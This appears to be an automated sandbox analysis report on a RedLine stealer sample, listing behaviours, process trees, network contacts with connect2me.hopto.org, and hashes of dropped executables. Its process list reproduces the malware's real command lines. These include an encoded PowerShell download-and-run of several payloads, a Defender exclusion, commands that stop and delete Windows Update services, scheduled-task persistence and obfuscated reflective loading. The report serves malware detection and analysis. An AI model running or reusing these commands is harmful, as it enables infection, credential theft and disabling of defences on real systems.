Analysis Overview
SHA256
34efda61716ff1db7297813317e194d4eaa74ae5209810ef6045aabab2af3179
Threat Level: Known bad
The file 1d678410484e34165adb652f7e86a2b5cae5f58d was found to be: Known bad.
Malicious Activity Summary
Modifies security service
RedLine payload
RedLine
Suspicious use of NtCreateProcessExOtherParentProcess
Suspicious use of NtCreateUserProcessOtherParentProcess
Drops file in Drivers directory
Stops running service(s)
Blocklisted process makes network request
Executes dropped EXE
Downloads MZ/PE file
Uses the VBS compiler for execution
Loads dropped DLL
Accesses cryptocurrency files/wallets, possible credential harvesting
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Launches sc.exe
Drops file in Program Files directory
Program crash
Creates scheduled task(s)
Checks processor information in registry
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-01-28 19:11
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-01-28 19:11
Reported
2023-01-28 19:14
Platform
win7-20221111-en
Max time kernel
150s
Max time network
34s
Command Line
Signatures
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security | C:\Windows\System32\reg.exe | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 676 created 1256 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 676 created 1256 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 676 created 1256 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 676 created 1256 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 1584 created 420 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C4Loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\new2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SysApp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe | N/A |
Stops running service(s)
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Uses the VBS compiler for execution
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Tasks\Telemetry Logging | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\System32\Tasks\Telemetry Logging | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1792 set thread context of 832 | N/A | C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
| PID 676 set thread context of 1980 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\System32\dialer.exe |
| PID 1584 set thread context of 108 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\appcompat\programs\RecentFileCache.bcf | C:\Windows\system32\svchost.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80d3e0cc5433d901 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
\\?\C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
C:\Windows\system32\taskhost.exe
"taskhost.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe
"C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 48
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdABhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBjAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB4AHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwBhAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAcwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwB3AGQAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGoAYgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBlAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBtAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBqAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcQB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHUAYQB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBoAGkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcAB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwBqAGwAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBoAHgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQBkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAdgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB5AGkAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBoAGYAZAAjAD4A"
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenQC /tr "'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe'"
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\system32\taskeng.exe
taskeng.exe {562226B3-D647-4EA0-A4F3-C041BFFF36B2} S-1-5-18:NT AUTHORITY\System:Service:
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+'T'+'WA'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+''+[Char](108)+''+'e'+'r'+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+[Char](84)+''+'W'+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+'a'+''+'l'+''+[Char](101)+''+[Char](114)+'s'+'t'+''+'a'+'g'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-868585925-1729289589-2038706777-872201068-88467612910387035072018789241994729253"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{42c00469-4ef9-4d4a-9701-568ef837afa9}
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {47688BCE-F7EE-42CA-98C4-E792EA811ED0} S-1-5-21-3385717845-2518323428-350143044-1000:SABDUHNY\Admin:Interactive:[1]
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | connect2me.hopto.org | udp |
| N/A | 37.139.129.113:443 | connect2me.hopto.org | tcp |
Files
memory/832-54-0x0000000000400000-0x0000000000405000-memory.dmp
memory/832-56-0x0000000000400000-0x0000000000405000-memory.dmp
memory/832-62-0x0000000000401159-mapping.dmp
memory/832-63-0x00000000760A1000-0x00000000760A3000-memory.dmp
memory/832-64-0x0000000000400000-0x0000000000405000-memory.dmp
memory/764-65-0x0000000000000000-mapping.dmp
memory/292-66-0x0000000000000000-mapping.dmp
memory/292-68-0x0000000073300000-0x00000000738AB000-memory.dmp
\Users\Admin\AppData\Local\Temp\C4Loader.exe
| MD5 | bb86a343080f9f4696c250ef31a18d9d |
| SHA1 | 43b2193dcb1d56eac73ba88a7b461822074192d6 |
| SHA256 | 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0 |
| SHA512 | 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560 |
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
| MD5 | bb86a343080f9f4696c250ef31a18d9d |
| SHA1 | 43b2193dcb1d56eac73ba88a7b461822074192d6 |
| SHA256 | 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0 |
| SHA512 | 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560 |
memory/1708-71-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\C4Loader.exe
| MD5 | bb86a343080f9f4696c250ef31a18d9d |
| SHA1 | 43b2193dcb1d56eac73ba88a7b461822074192d6 |
| SHA256 | 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0 |
| SHA512 | 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560 |
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
| MD5 | bb86a343080f9f4696c250ef31a18d9d |
| SHA1 | 43b2193dcb1d56eac73ba88a7b461822074192d6 |
| SHA256 | 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0 |
| SHA512 | 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560 |
\Users\Admin\AppData\Local\Temp\new2.exe
| MD5 | 3753f9966e5b4fdc87184c1749f2bd25 |
| SHA1 | 69b76e86bfb4fcf4c0eb2f5fc8b71356e9f4e756 |
| SHA256 | 0f1d090c622967acfa7bde2ef5238255ce8924d5ff7bbf72661821e3d901f299 |
| SHA512 | 3283dfee96e0089873336f3c699604eb33d5c091cdf65a193d4f8e1850625823f62dc02d242290dfd10c10f127bfec26f55b6438fc9ab2c0dd5c9f7cb764e8b6 |
C:\Users\Admin\AppData\Local\Temp\new2.exe
| MD5 | 3753f9966e5b4fdc87184c1749f2bd25 |
| SHA1 | 69b76e86bfb4fcf4c0eb2f5fc8b71356e9f4e756 |
| SHA256 | 0f1d090c622967acfa7bde2ef5238255ce8924d5ff7bbf72661821e3d901f299 |
| SHA512 | 3283dfee96e0089873336f3c699604eb33d5c091cdf65a193d4f8e1850625823f62dc02d242290dfd10c10f127bfec26f55b6438fc9ab2c0dd5c9f7cb764e8b6 |
memory/1268-75-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\SysApp.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
\Users\Admin\AppData\Local\Temp\SysApp.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
memory/1048-79-0x0000000000000000-mapping.dmp
memory/1708-81-0x0000000001050000-0x00000000011BC000-memory.dmp
\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
| MD5 | f5c51e7760315ad0f0238d268c03c60e |
| SHA1 | 85ebaaa9685634143a72bc82c6e7df87a78eed4c |
| SHA256 | ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa |
| SHA512 | d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35 |
memory/676-83-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
| MD5 | f5c51e7760315ad0f0238d268c03c60e |
| SHA1 | 85ebaaa9685634143a72bc82c6e7df87a78eed4c |
| SHA256 | ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa |
| SHA512 | d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35 |
memory/292-85-0x0000000073300000-0x00000000738AB000-memory.dmp
memory/1708-86-0x0000000004A50000-0x0000000004BB6000-memory.dmp
memory/1708-88-0x0000000005170000-0x00000000052BE000-memory.dmp
memory/1708-89-0x00000000003C0000-0x00000000003D4000-memory.dmp
memory/1048-90-0x0000000001E30000-0x0000000002334000-memory.dmp
memory/1048-91-0x0000000001E30000-0x0000000002334000-memory.dmp
memory/1048-92-0x0000000002340000-0x000000000247D000-memory.dmp
memory/1708-93-0x0000000001006000-0x0000000001017000-memory.dmp
memory/1048-94-0x0000000002340000-0x000000000247D000-memory.dmp
memory/1316-96-0x000007FEFBCE1000-0x000007FEFBCE3000-memory.dmp
